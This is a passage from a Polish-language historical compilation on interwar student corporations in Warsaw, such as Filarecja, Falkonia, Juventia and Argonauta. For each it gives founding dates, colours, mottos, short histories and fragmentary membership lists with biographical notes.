 4. Jerzy Dembiński, akt. 1924-26, sekretarz sem. zim. oraz sem. let. 1924/25
 5. Maciej Domaszewski, prawd. z rodziny ziemiańskiej, herbu Drzymała, prawd. s. Stanisława i Zofii, akt. 1924-25
 6. Jan Freyer, akt. 1924-26

  Kazimierz Roman Grabowski

 7. Kazimierz Roman Grabowski, (23 lutego 1901 w Piątku pod Łęczycą - 4 kwietnia 1940 w Katyniu) s. Romualda i Marianny z Pałczyńskich, w 1920 ochotnik WP, absolwent Gimnazjum Wojciecha Górskiego 1923, student prawa UW 1923-25, a od 1931 Wydziału Humanistycznego UW, absolwent Państwowego Instytutu Pedagogiki Specjalnej 1933, założyciel Legetii, akt. 1924-26, ukończył kurs w BPRPiechoty nr 7 w Śremie 1929, mianowany ppor. rez. 1929, pracował jako nauczyciel w Szkole Powszechnej w Łodzi, a następnie w Powszechnej Szkole Specjalnej w Warszawie, w wojnie obronnej walczył w obronie Warszawy i Siedlec, gdzie został wzięty do niewoli rosyjskiej, osadzony w obozie jenieckim

 8. Włodzimierz Górski, akt. 1924-25
 9. Michał Hordliczka, akt. 1924-26
 10. Jan Kamieński, akt. 1924-26, prezes sem. let. 1925/26
 11. Zygmunt Kiernik, akt. 1924-26
 12. Jerzy Kunce, prawd. brat Władysława (Legetia), akt. 1925-26
 13. Władysław Kunce, prawd. brat Jerzego (Legetia), akt. 1924-26
 14. Aleksander Makomaski, akt. 1924-26
 15. Marian Makomaski, akt. 1924-25
 16. Witold Marcinkowski, akt. 1924-26
 17. Wiktor Mikulecki, akt. 1924-25
 18. Czesław Pogorzelski, akt. 1924-26, sekretarz sem. let. 1925/26
 19. Stanisław Słowikowski, akt. 1924-26
 20. Seweryn Wolski, akt. 1924-26, wiceprezes sem. zim. oraz sem. let. 1924/25
 21. Wincenty Wróblewski, akt. 1924-25, skreślony 1924/25
 22. Zdzisław Zbieć, ( - wrzesień 1969) akt. 1924-26, olderman sem. zim. 1924/25, prezes sem. let. 1924/25, adwokat

Opublikowano: 21 IX 2010 r.
Ostatnia zmiana: 17 IX 2017 r.

XV. Monsalwacja

Data powstania: 1924 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Monsalwacja powstała w 1924 r. Była jedną z trzech działających w dwudziestoleciu międzywojennym w Polsce żydowskich korporacji akademickich o charakterze asymilanckim.

XVI. Konfederacja Filarecja

Data powstania: 1925 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Konfederacja Filarecja powstała pod koniec 1925 r. Skupiała studentów Uniwersytetu Warszawskiego. Kuratorem stowarzyszenia był prof. Eugeniusz Jarra. Filarecja należała do związku międzykonfederacyjnego - Konfederacji Generalnej Polskiej Młodzieży Akademickiej.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 22 nazwiska, w tym jednego członka honorowego.

Lista członków

Członkowie honorowi

  Jan Rembieliński, 1930 r.

 1. Jan Rembieliński, red., Filister honorowy Filarecji [prawd. Jan Rembieliński (11 czerwca 1897 w Warszawie - 16 października 1948 w Londynie) uczestnik walk w obronie Lwowa, publicysta, działacz i polityk endecki, współorganizator Narodowego Zjednoczenia Młodzieży Akademickiej przekształconego w 1922 w Młodzież Wszechpolską, pierwszy prezes MW 1922-23, pisał m.in. do „Myśli Narodowej”, „Małego Dziennika”, w połowie lat 30-tych opóścił SN i związał się z sanacją, senator V kadencji 1938-39, po wybuchu wojny znalazł się we Francji, gdzie wstąpił na ochotnika do WP, później w Wielkiej Brytanii, pochowany na cmentarzu Kensal Green w Londynie]

Członkowie rzeczywiści

 1. Jerzy Biernacki, (1970-1977) akt. 1927-33, wiceprezes 1927/28, prokurator sem. zim. 1932/33, wiceprezes Konfederacji Generalnej Polskiej Młodzieży Akademickiej 1927
 2. Marian Byczkowski, prokurator sem. let. 1931/32
 3. Teodozjusz Jan Antoni Chełmicki, po wojnie na emigracji w Argentynie
 4. Jan Dziewanowski, prezes sem. let. 1928/29, sekretarz 1927 oraz przewodniczący Sądu 1929 Konfederacji Generalnej Polskiej Młodzieży Akademickiej
 5. Roman Dzierżanowski,
 6. Bolesław Górnicki, (1909-1998) sekretarz sem. let. 1928/29 oraz sem. zim. 1929/30, lekarz, prof. pediatrii
 7. Wacław Grymowski, wiceprezes sem. let. 1928/29
 8. Janusz Keller, członek Sądu sem. zim. 1929/30 oraz sem. let. 1931/32
 9. Zygmunt Horodecki, sekretarz 1927/28, prezes sem. zim. 1929/30
 10. Janusz Bożewicz-Jałowiecki, sekretarz sem. let. 1931/32 oraz sem. zim. 1932/33
 11. M. Janicki, członek Sądu ssem. let. 1931/32
 12. Mieczysław Jankowski, członek Sądu sem. zim. 1929/30
 13. Jerzy Doliwa-Jaworczykowski, wiceprezes sem. let. 1931/32 oraz sem. zim. 1932/33
 14. Tadeusz Lipkowski, przewodniczący Sądu sem. zim. 1932/33, działacz ONR-Falanga
 15. Tadeusz Mierzejewski, akt. 1927-33, prezes 1927/28, członek Sądu sem. zim. 1932/33
 16. Andrzej Mikułowski, prezes sem. let. 1931/32, prezes sem. zim. 1932/33, prezes Konfederacji Generalnej Polskiej Młodzieży Akademickiej 1933/34
 17. Jerzy Orłowski, przewodniczący Sądu sem. zim. 1929/30, prezes sem. zim. 1931/32, przewodniczący Sądu sem. let. 1931/32
 18. Kazimierz Ostrowski, członek Sądu sem. zim. 1932/33
 19. Franciszek Przyjemski, prokurator sem. zim. 1929/30, sekretarz Konfederacji Generalnej Polskiej Młodzieży Akademickiej 1929
 20. Włodzimierz Sznarbachowski, (2 grudnia 1913 w Sankt Petersburgu - 24 stycznia 2003 w Locarno) poeta, prozaik, publicysta, przed wojną działacz ONR-Falanga, w czasie wojny w Rzymie w podziemnej Delegaturze Rządu RP na Uchodźstwie, od 1946 w emigracyjnej PPS, red. Rozgłośni Polskiej Radia Wolna Europa w Monachium 1952-90, odznaczony Krzyżem Oficerskim OOP
 21. Janusz Turski , wiceprezes sem. zim. 1929/30, wiceprezes Konfederacji Generalnej Polskiej Młodzieży Akademickiej 1929, 1930 oraz 1933/34

XVII. Akademicka Korporacja Syjonistyczna Libanonia

Data powstania: 1925 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Libanonia powstała w 1925 r. Była korporacją żydowską. Należała do Związku Akademickich Zrzeszeń Korporacji Syjonistycznych.

Całkowita ustalona, imienna lista członków obejmuje tylko dwa nazwiska.

Lista członków

 1. Izaak Finkelstein, prezes sem. zim. 1929/30
 2. Neufeld, mgr, zastępca prezesa Związku Filistrów Żydowskich Korporacji Syjonistycznych w Polsce w 1933

XVIII. Maratonia

Data powstania: przed 1926 r.
Barwy: ?
Dewiza: ?

Rys historyczny

W 1925 r. Maratonia należała do Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich i pozostawała w związku przynajmniej do 1931 r. Brak wiadomości o dalszych losach korporacji.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje jedno nazwisko.

Lista członków

 1. Stanisław Latoszyński, (6 września 1911 - 21 września 1989) po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, pochowany na Cmentarzu St. Adalberta w Chicago

XIX. Warnenia

Data powstania: przed 1926 r.
Barwy: ?
Dewiza: ?

Rys historyczny

W 1925 r. Warnenia należała do Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich. Już w 1928 r. nie występowała jednak jako członek związku. Prawdopodobnie zanikła.

XX. Baltitia

Data powstania: przed 1926 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Baltitia powstała w latach 20-tych. Działalność korporacji koncentrować się miała na problematyce morskiej. Wiadomo, że wraz z działającymi w Warszawie innymi korporacjami morskimi - K! Concordia Varsoviensis i K! Maritimia była współzałożycielką Centralnego Koła Młodzieży przy warszawskim oddziale Ligi Morskiej i Rzecznej.

W 1932 r. należała do grona korporacji, które powołały sanacyjny związek międzykorporacyjny - Federację Polskich Korporacji Akademickich.

XXI. Sagitia

Data powstania: przed 1926 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Sagitia (strzała) powstała prawdopodobnie przed 1926 r. W latach 30-tych należała do korporacji sanacyjnych. W 1932 r. była współzałożycielką sanacyjnej Federacji Polskich Korporacji Akademickich.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje jedno nazwisko.

Lista członków

 1. Feliks Maliszewski, pierwszy II wiceprezes Federacji Polskich Korporacji Akademickich 1933-34, I wiceprezes Federacji 1933

XXII. Hetmania

Data powstania: przed 1926 r.
Barwy: ?
Dewiza: ?

Rys historyczny

W 1925 r. Hetmania należała do Konwentu Polskich Korporacji Akademickich.

XXIII. Związek Akademików Niemieckich w Warszawie

Data powstania: 23 IX 1926 r.
Barwy: czarna – srebrna – zielona
Dewiza: „Deutsche Art treu bewahrt” („Dla zachowania niemieckiego zwyczaju”)

Komers rocznicowy Związku Akademików Niemieckich w Warszawie, 1933 r.

Związek Akademików Niemieckich (Verein Deutscher Hochschüler) w Warszawie powstał dnia 23 IX 1926 r. w Łodzi. Statut korporacji wzorowano na statutach związków akademików niemieckich z Lwowa i Poznania. Dnia 6 IV 1927 r. został on zatwierdzony przez Senat UW. Kuratorem z ramienia uczelni był germanista prof. Zygmunt Łempicki.

Korporacja miała charakter koedukacyjny. W jej ramach działała Grupa Niemieckich Studentek (Gruppe Deutscher Studentinnen). Od 1928 r. noszono barwy w pomieszczeniach korporacji, a w 1931 r. uzyskano zgodę uczelni na noszenie barw także na terenie Uniwersytetu. W 1931 r. powołano Koło Filistrów.

Korporacja należała do powstałego w 1926 r. Zrzeszenia Związków Akademików Niemieckich w Polsce (Verband der Vereine Deutscher Hochschüler in Polen).

W końcu lat 30-tych, podobnie jak koproracje studenckie w Niemczech, także Związek Akademików Niemieckich w Warszawie przekształcił się w tzw. kameradszaft (niem. Kameradschaft).

Całkowita ustalona, imienna lista członków obejmuje 245 nazwisk. Członkiem honorowym korporacji był m.in. przewodniczący niemieckiej grupy posłów w polskim Sejmie Eugen Naumann.

Po wojnie członkowie korporacji należali do dziełającego w Republice Federalnej Niemiec Zrzeszenia Związków Akademików Niemieckich w Polsce (Verband der Vereine Deutscher Hochschüler Polens).

XXIV. Konfederacja Falkonia

Data powstania: 8 grudzień 1926 r.
Barwy: złota - czerwona - fioletowa (?)
Dewiza: ?

Rys historyczny

Konfederacja Falkonia powstała w końcu 1926 r. Skupiała studentów Uniwersytetu Warszawskiego (Wydziału Prawa UW?). Kuratorem stowarzyszenia z ramienia uniwersyteckiego Senatu był prof. Bohdan Wasiutyński. Falkonia należała do związku międzykonfederacyjnego - Konfederacji Generalnej Polskiej Młodzieży Akademickiej.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 17 nazwisk.

Lista członków

  Edward Chądzyński, 1929 r.

 1. Edward Chądzyński

 2. Jan Dobraczyński, sekretarz sem. let. 1931/32

  Tadeusz Fabiani, 1929 r.

 3. Tadeusz Fabiani

  Włodzimierz Kamiński, 1929 r.

 4. Włodzimierz Kamiński, członek Sądu sem. let. 1929/30,

  Jerzy Jeżewski, 1929 r.

 5. Jerzy Jeżewski

  Marek Kubiczek, 1929 r.

 6. Marek Kubiczek, prokurator sem. let. 1929/30

  Kalikst Morawski, 1929 r.

 7. Kalikst Morawski, członek Sądu sem. let. 1929/30

  Juliusz Pawlikiewicz, 1929 r.

 8. Julian (Juliusz ?) Pawlikiewicz, przewodniczący Sądu sem. let. 1931/32

 9. Witold Pelz, sekretarz Konfederacji Generalnej Polskiej Młodzieży Akademickiej 1933/34

  Tadeusz Rakowski, 1929 r.

 10. Tadeusz Rakowski

  Lech Sokołowski, 1929 r.

 11. Lech Sokołowski, prezes sem. zim. 1929/30 oraz sem. let. 1929/30

  Franciszek Stember (?), 1929 r.

 12. Franciszek Stember (?)

  Jan Sulej, 1929 r.

 13. Jan Sulej

 14. Tadeusz Witold Urbanowski, (1911-1943) (2 grudnia 1911 w Warszawaie -31 stycznia 1943 w Auschwitz) brat Witolda (Falkonia), absolwent Gimnazum im. Adama Mickiewicza w Warszawie i prawa UW, wiceprezes sem. let. 1931/32, prokurator Konfederacji Generalnej Polskiej Młodzieży Akademickiej 1933/34, członek Związku Polskiego, red. pisma “Alarm”, aplikant adwokacki, w czasie okupacji pracował w Wydziale Prawnym Elektrowni Warszawskiej, działał w konspiracji, aresztowany w wyniku wsypy 17 lipca 1942 i osadzony na Pawiaku, gdzie przeybwał do 17 listopada 1942, wywieziony do obozu koncentracyjnego Auschwitz (nr obozowy 75888) [Źródła (poza wskazanymi poniżej spisu członków): relacja bratanka Michała Urbanowskiego]

  Witold Urbanowski, 1929 r.

 15. Witold Urbanowski, (1905-1953) brat Tadeusza (Falkonia), absolwent Gimnazjum im. Adama Mickiewicza w Warszawie i prawa UW, członek Tytanii 1926, później w Konfederacji Falkonia, wiceprezes sem. let. 1929/30, prezes sem. zim. oraz sem. let. 1931/32, II wiceprezes 1927 oraz prezes 1931 Konfederacji Generalnej Polskiej Młodzieży Akademickiej [Źródła (poza wskazanymi poniżej spisu członków): relacja syna Michała Urbanowskiego]

  Stanisław Zaremba, 1929 r.

 16. Stanisław Zaremba, przewodniczący Sądu sem. let. 1929/30, wiceprezes Konfederacji Generalnej Polskiej Młodzieży Akademickiej 1933/34

  Karol Zatorski, 1929 r.

 17. Karol Zatorski, sekretarz sem. let. 1929/30

  Falkonia, siedzą od lewej: Witold Urbanowski, Leszek Sokołowski, prof. Bohdan Wasiutyński, Tadeusz Fabiani, Rutek Zatorski, stoją Marek de Valdorff Kubiczek, Stanisław Zaremba, Kalikst Morawski, Jan Sulej, Włodzimierz Kamiński, stoją w II rzędzie Juliusz Pawlikiewicz, Jerzy Jeżewski, Franciszek Stember, Edward Chądzyński, Tadeusz Rakowski, 8 XII 1929 r.

  Ostatnia zmiana: 28 IV 2018 r.

XXVI. Juventia

Data powstania: 26 III 1927 r.
Barwy: grantowo - srebrno - złote
Dewiza: “Macte animo” (”Chwala duchowi, odwadze!”)

Rys historyczny

Juventia została założona przez grupę wychowanków Gimnazjum im. Mikołaja Reja w Warszawie. Prace nad powołaniem nowego konwentu trwały od jesieni 1926 r. Początkowo miała nosić nazwę “Falkonja”, ale w związku z istnieniem na uczelniach warszawskich innej organizacji akademickiej o takiej nazwie (Konfederacji Falkonia) przyjęto nazwę “Juventia”. Dnia dnia 26 III 1927 r. nastąpiło podpisanie statutu przez grupę członków-założycieli, a 3 III 1927 r. po uroczystym nabożeństwie odbyło się nałożenie barw członkom-założycielom.

Od 1935 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: maj 1935 r.). Kandydowała pod opieką K! Sarmatia. Prawa członka rzeczywistego uzyskała w 1936 r.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 15 nazwisk, w tym jednego członka honorowego.

Lista członków

 1. Leon Bojarski (?)
 2. Mieczysław Borzęcki
 3. Jerzy Głowacki
 4. Józef Grabowski
 5. Zygmunt Grela, ( - 20 listopada 1994)
 6. Antoni Jankowski,
 7. Zdzisław Otwinowski, (15 maja 1905 w Warszawie - ) s. Romana i Ludwiki ze Staniewskich, absolwent Gimnazjum im. Mikołaja Reja 1926, student i absolwent UW 1926-31, c. 1927, skarbnik 1928/29
 8. Jerzy Rudny, syn Mieczysława (Juventia), bratanek Tadeusza (Venedia), brat Woisława (Juventia)
 9. Mieczysław Rudny, brat przyrodni Tadeusza (Venedia), ojciec Jerzego i Woisława (Juventia), członek honorowy Juventii
 10. Woisław Wacław Rudny, syn Mieczysława (Juventia), bratanek Tadeusza (Venedia), brat Jerzego (Juventia), olderman
 11. Józef Sikorski
 12. Franciszek Sobolewski
 13. Zdzisław Szcześniewski, ziemianin, właściciel maj. Gosławice k. Radomska
 14. Tadeusz Tokarski (?), inicjator powstania korporacji 1926, pierwszy prezes sem. let. 1926/27
 15. Marian Tymowski

  Ostatnia zmiana: 19 VII 2011 r.

XXVII. Konfederacja Prometania

Data powstania: grudzień 1927 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Konfederacja Prometania powstała w końcu 1927 r. Skupiała młodzież studiującą w Państwowej Szkole Mechaniczno-Technicznej im. H. Wawelberga i S. Rotwanda. Należała do związku międzykonfederacyjnego - Konfederacji Generalnej Polskiej Młodzieży Akademickiej.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje trzy nazwiska, w tym jednego członka honorowego.

Lista członków

Członkowie honorowi

 1. Usarowicz, inż. prof., Filister honorowy Prometanii [prawd. Ludwik Uzarowicz (10 lipca 1886 w Sadłowie k. Rypina - 10 maja 1975 w Warszawie), inż. elektryk, w dwudziestoleciu kierownik warsztatów Państwowej Szkoły Budowy Maszyn i Elektrotechniki im. H. Wawelberga i S. Rotwanda, od 1945 rektor Szkoły Inżynierskiej im. H. Wawelberga i S. Rotwanda od 1947 prof. nazw., od 1949 prof. zw., od 1951 prof. i kierownik Katedry Obrabiarek na Wydziale Mechanicznym Konstrukcyjnym PW, przewodniczący Zarządu Głównego SIMP 1946-48, pochowany na warszawskich Powązkach]

Członkowie rzeczywiści

 1. Saturnin Grzybowski, prezes sem. zim. 1937/38
 2. Nagórski (?),

XXVIII. Ignitia

Data powstania: przed 1928 r.
Barwy: ?
Dewiza: ?

Rys historyczny

W grudniu 1928 r. Ignitia została przyjęta do Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich. Jeszcze w 1931 r. należała do Zjednoczenia. Brak wiadomości o dalszych losach korporacji.

XXIX. Akademicka Korporacja Syjonistyczno-Rewizjonistyczna Galijah

Data powstania: 1928 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Galijah powstała w 1928 r. Była korporacją żydowską. Należała do nurtu syjonistyczno-rewizjonistycznego.

Lista członków

 1. N. Bidermann, sekretarz Związku Filistrów Żydowskich Korporacji Syjonistycznych w Polsce 1933

XXX. Akademicka Korporacja “Imperia”

Data powstania: przed listopadem 1929 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Imperia należała najprawdopodobniej do korporacji o orientacji sanacyjnej.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje dwa nazwiska.

Lista członków

  Janusz Dykas, 1936 r.

 1. Janusz Dykas, 3 stycznia 1897 w Vulcan w stanie Michigan w Stanach Zjednoczonych - 23 lipca 1939 w Dębowcu pow. Jasło) s. Antoniego i Katarzyny z d. Trzeciak, w czasie I wojny światowej służył w armii austriackie 1915-18, żołnierz WP 1918-21, walczył na froncie włoskim 1916-17, na froncie ukraińskim X 1918 - II 1919, na froncie bolszewickim V 1920 - X 1929, w powstanu górnośląskim, por., sekretarz Klubu Sejmowego BBWR, Filister honorowy Imperii, pochowany na cmentarzu w Dębowcu pow. Jasło [Źródła (poza wskazanymi poniżej spisu członków): relacja siostrzeńca Ryszarda Żytkiewicza]

 2. Kozłowski (?), prezes sem. zim. 1929/30

XXXI. Ikaria

Data powstania: przed 1926 r. (?)
Barwy: ?
Dewiza: ?

Rys historyczny

Korporacja Ikaria istniała prawdopodobnie przynajmniej od połowy lat 20-tych. Ok. 1936 r. z powodu braku dopływu nowych członków zaprzestała działalności. Dalej funkcjonowało jednak Koło Filistrów.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje siedem nazwisk.

Lista członków

 1. Szczepan Bocheński, prawnik
 2. Kazimierski, prawnik
 3. Artur Kassur, (14 kwietnia 1902 w Łodzi - 10 kwietnia 1978 w Warszawie) s. Adolfa i Emmy, brat Bertolda i Hugona (obaj Icaria, Warszawa), olderman, dr chemii, po wojnie pracował w FSO, pochowany na Cmentarzu Katolicko-Prawosławnym na Woli (kwatera 84, grób 25)
 4. Bertold Adolf Kassur, (10 grudnia 1906 w Łodzi - 15 marca 1982 w Warszawie) s. Adolfa i Emmy, brat Artura i Hugona (obaj Icaria, Warszawa), student i absolwent 1931 med. UW, dr med. 1936, internista i specjalista z zakresu chorób zakaźnych, uczestnik wojny obronnej 1939, w konspiracji w AK, ppor., w Powstaniu Warszawskim kierował szpitalem powstańczym na Reducie Kaliskiej na Ochocie, habilitacja 1952, prof. AM w Warszawie, Specjalista Krajowy Chorób Zakaźnych, odznaczony Krzyżem AK, Kawaler Legii Honorowej, pochowany na warszawskich Powązkach
 5. Hugon Kassur, (28 listopada 1904 w Łodzi - 10 sierpnia 1944 w Warszawie) s. Adolfa i Emmy, brat Artura i Bertolda (obaj Icaria, Warszawa), student i absolwent SGH, jeden z szefów delegacji PCK do Katynia 1943, w konspiracji w AK, ppor., w Powstaniu Warszawskim walczył na Reducie Kaliskiej na Ochocie, zginął w nieznanym miejscu w czasie ewakuacji z Ochoty
 6. Wacław Sapiński,
 7. Kazimierz Witulski, (1908-1984) prawnik, adwokat

Czarna kawa Ikarii, 3 IV 1926 r.

XXXII. Priora (żeńska)

Data powstania: 1930 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Priora, maj 1930 r.

Priora (Prioria) powstała najprawdopodobniej w maju 1930 r. U podstaw stworzenia korporacji żeńskiej legło - jak pisano - przekonanie, że mimo zaangażowania i sukcesów pojedynczych kobiet w sporcie, polityce, życiu społecznym, “połowa społeczeństwa, którą stanowią kobiety, leniwie drzemie”. Celem korporacji miała być praca społeczna i praca nad sobą. Jak wskazywano “stwarzamy typ studentki-korporantki o zdecydowanej sylwetce ideowej”.

Zadaniem korporacji było “stojąc twardo na stanowisku państwowości polskiej, abstrahowanie od starć politycznych społeczeństwa, uspołecznianie członkiń; wychowanie prawych obywatelek Państwa; konkretna praca na ternie Wolnego Miasta Gdańska w celu podania bratniej dłoni rodakom w trudnej walce o zachowanie w najczystszej formie pierwiastków kultury i tradycji polskiej; uczynienie z Gdańska sprawy Polskiego morza, a z rozbudowy floty narodowej, marynarki handlowej i wojennej nakazu polskiej racji stanu.” Z kolei: “W zakresie pracy nad samokształceniem program korporacji obejmuje podniesienie poziomu intelektualnego i uzupełnienie wykształcenia; koleżeńskie dopilnowanie członkiń w rzetelnym studiowaniu na swych uczelniach; stworzenie serdecznej samopomocy moralnej, naukowej i materjalnej; wyrobienie solidarności i absolutnego zaufania; wytworzenie na gruncie towarzyskim Korporacji współżycia, wiążącego na długie lata, a nawet na życie całe.” Członkinie Priory były zobowiązane do propagowania zupełnej abstynencji i podejmowania walki z alkoholizmem.

Całkowita ustalona, fragmentaryczna imienna lista członkiń obejmuje cztery nazwiska.

Lista członków

 1. Zofia Majewska, założycielka Priori, pierwsza prezeska od maja 1930
 2. H. Makowska, założycielka Priori, członkini pierwszego Prezydium od maja 1930
 3. T. Młodzińska, założycielka Priori, członkini pierwszego Prezydium od maja 1930
 4. Janina Stogniew-Własewicz,

XXXIII. Polska Żeńska Korporacja Akademicka Auxilia

Data powstania: luty 1931 r.
Barwy: ?
Dewiza: ?

Całkowita ustalona, fragmentaryczna imienna lista członkiń obejmuje trzy nazwiska.

Lista członków

 1. Janina Guzowska, założycielka Auxilii, pierwsza wiceprezeska 1931
 2. Janina Mikułowska, założycielka Auxilii, pierwsza sekretarz 1931
 3. Władysława Srzednicka, założycielka Auxilii, pierwsza prezeska 1931

XXXIV. Argonauta

Data powstania: 10 III 1931 r.
Barwy: karmazynowa (bordowa ?) – złota – szafirowa
Dewiza: „Polonia colonios habere - necesse est” („Konieczne jest aby Polska miała kolonie”, wg innych danych „Navigare necesse est! Polonia coloniae habere - necesse est”)

Rys historyczny

Herb Argonauty.

Argonauta powstała dnia 10 III 1931 r. Celem korporacji było krzewienie i wzmacnianie w polskim społeczeństwie zainteresowania tematyką morską, znaczeniem morza i handlu morskiego dla Polski oraz zdobycie koncesji handlowych w dawnych koloniach niemieckich. Argonauta współpracowała z Wydziałem Handlu Morskiego Ministerstwa Przemysłu i Handlu oraz Ligą Morską i Kolonialną.

W 1932 r. Argonauta należała do współzałożycieli sanacyjnej Federacji Polskich Korporacji Akademickich. Zawarła kartel z K! Vikingia. Przy korporacji istniało Koło Pań. Działała do wybuchu wojny w 1939 r.

Siedziby korporacji mieściły się: w latach 1931-32 przy ul. Słonecznej, a następnie do wybuchu wojny przy Krakowskim Przedmieściu (w prawej oficynce UW, przylegającej do kościoła ss. Wizytek).

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 18 nazwisk, w tym czterech członków honorowych.

Lista członków

Członkowie honorowi

 1. Łukasiewicz, rektor, Filister honorowy Argonauty [prawd. Jan Łukasiewicz (21 grudnia 1879 we Lwowie - 13 lutego 1956) student prawa i filozofii, absolwent filozofii UJK, doktorat 1902, studiował także m.in. w Niemczech i w Belgii, od 1915 prof., w latach 1922–23 i 1931-32 rektor UW, w konspiracji w tajnym nauczaniu, kierownik katedry logiki Królewskiej Akademii Irlandzkiej w Dublinie 1946-56, członek PAU, doktor honoris causa Uniwersytetu w Münster i Królewskiej Akademii Irlandzkiej, laureat nagrody naukowej Warszawy 1935]
 2. Feliks Malinowski dr, Filister honorowy Argonauty
 3. Michałowicz, rektor, Filister honorowy Argonauty [prawd. Mieczysław Jan Michałowicz (10 września 1876 w Petersburgu - 22 grudnia 1965 w Warszawie) lekarz, pediatra, naukowiec, działacz polityczny i społeczny, członek PPS 1896-1906, uczestnik rewolucji 1905, prof. i rektor 1930-31 UW, senator IV kadencji z ramienia sanacji 1935-38, w 1939 współzałożyciel i pierwszy prezes Zarządu Głównego Stronnictwa Demokratycznego, w czasie wojny więziony przez Niemców, w 1944 działacz koncesjonowanego Stronnictwa Demokratycznego, prezes Rady Naczelnej SD 1945-49, od 1949 honorowy prezes SD, poseł do Krajowej Rady Narodowej, a potem na Sejm Ustawodawczy w latach 1945–1952, członek PAU i PAN, jako wolnomularz członek loży Wolność Przywrócona]
 4. Gustaw Orlicz-Dreszer, (2 października 1889 w Jadowie k. Wołomina - 16 lipca 1936 w Gdyni Orłowie) s. Jana Augusta i Emilii z Ruschów, absolwent Gimnazjum w Częstochowie 1907, student prawa Uniwersytet we Lwowie oraz handlu na Uniwersytecie w Leodium w Belgii oraz w Akademii Eksportowej w Hawrze we Francji, żołnierz Legionów Polskich, członek Polskiej Organizacji Wojskowej, kawalerzysta, oficer WP, organizator i pierwszy dowódca 1 Pułku Szwoleżerów, generał dywizji Wojska Polskiego, od 1930 prezes Zarządu Głównego Ligi Morskiej i Kolonialnej, Filister honorowy Argonauty, zginął śmiercią tragiczną w katastrofie lotniczej

Członkowie rzeczywiści

 1. Jerzy Czarnocki, brat Kazimierza (Argonauta), założyciel Argonauty
 2. Kazimierz Czarnocki, brat Jerzego (Argonauta), założyciel Argonauty
 3. Zbigniew Duszyński, założyciel Argonauty, inż.
 4. Zbigniew? Kiersnowski, po wojnie na emigracji, członek Związku Literatów w Londynie
 5. Tadeusz Kochanowicz, ( - 14 sierpnia 1995 w Warszawie) założyciel Argonauty, mgr, prawdopodobnie minister (wiceminister) w okresie PRL-u
 6. Janusz Malinowski, student prawa UW, założyciel Argonauty, skarbnik Federacji Polskich Korporacji Akademickich 1932-33, mgr prawa, adwokat
 7. Kazimierz Malinowski,
 8. Bronisław Miszewski, ( - 2002) założyciel Argonauty, sekretarz Federacji Polskich Korporacji Akademickich 1933, ekonomista, prof. Politechniki Śląskiej
 9. Zbigniew Morawski, założyciel Argonauty, uczestnik ruchu oporu we Francji, odznaczony francuską Legią Honorową
 10. Zygmunt Morawski, (1914 w Oryninie - 25 czerwca 2005) c. 1933, absolwent prawa UW oraz Wyższej Szkoły Teatralnej, aktor dramatyczny, mjr WP, żołnierz AK, pochowany w grobie rodzinnym na warszawskich Powązkach
 11. Piotrowski,
 12. Jan Szalewicz, skarbnik Federacji Polskich Korporacji Akademickich 1933
 13. Stanisław Szczypiorski, założyciel Argonauty, ekonomista, prof. nauk ekonomicznych
 14. Wiktor Złotnicki,

XXXV. Vikingia

Data powstania: przed lipcem 1932 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Vikingia powstała przed lipcem 1932 r. Jej szczególnym zadaniem miała być praca na rzecz zbliżenia polsko-norweskiego. Należała do korporacji sanacyjnych powstałych pod wpływem Myśli Mocarstwowej. W 1932 r. była współzałożycielem sanacyjnej Federacji Polskich Korporacji Akademickich.

Zawarła kartel z K! Argonauta.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje cztery nazwiska.

Lista członków

 1. Władysław Dorosiewicz, drugi prezes Federacji Polskich Korporacji Akademickich 1933
 2. Stanisław Matuszewski, pierwszy wiceprezes Federacji Polskich Korporacji Akademickich 1932-33
 3. Kazimierz Korwin-Mianowski, sekretarz Federacji Polskich Korporacji Akademickich 1932-33
 4. Józef Winiarski, członek Komisji Rewizyjnej Federacji Polskich Korporacji Akademickich 1932-33

XXXVI. Polska Międzyuczelniana Akademicka Korporacja “Laborja”

Data powstania: przed lipcem 1932 r.
Barwy: ?
Dewiza: ?

Rys historyczny

W 1932 r. należała do grona korporacji, które powołały sanacyjny związek międzykorporacyjny - Federację Polskich Korporacji Akademickich. Prawdopodobnie była efemerydą.

Lista członków

 1. St. (?) Idziejewski (?), prezes
 2. M. (?) Jezierski, sekretarz

  Stefan Wiązowski

 3. Stefan Wiązowski, student PW

  Legitymacja korporacyjna Stefana Wiązowskiego.

  Ostatnia zmiana: 31 III 2020 r.

XXXVII. Prusia

Data powstania: przed lipcem 1932 r.
Barwy: ?
Dewiza: ?

Rys historyczny

W 1932 r. należała do grona korporacji, które powołały sanacyjny związek międzykorporacyjny - Federację Polskich Korporacji Akademickich. Prawdopodobnie była efemerydą.

XXXVIII. Weneda

Data powstania: 1932 r.
Barwy: ?
Dewiza: ?

Rys historyczny

W marcu 1933 r. starała się o przyjęcie do Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich.

XXXIX. Konfederacja Agronomia

Data powstania: przed 1933 r.
Barwy: ?
Dewiza: ?

Rys historyczny

